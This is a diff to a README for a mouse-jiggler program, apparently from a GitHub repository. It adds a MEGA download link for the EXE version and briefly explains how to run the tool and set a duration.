Nico-Darth/MouseJiggler/README.md

 ## Installation

 ### EXE Version
 For the EXE version, no installation is required.
-Simply download the EXE file and double-click to run the program.
+Simply download the EXE file here: **https://mega.nz/file/DBglwaob#Cmebyo3O-kVWwo6vehNqVmTOOZEz8Bwyg-S_B3bJCE4** and double-click to run the program.
 Upon running, you will be prompted to enter a duration in seconds.
 The program will then start the jiggling motion and display a timer window showing the remaining time.

 ### Python (.py) Version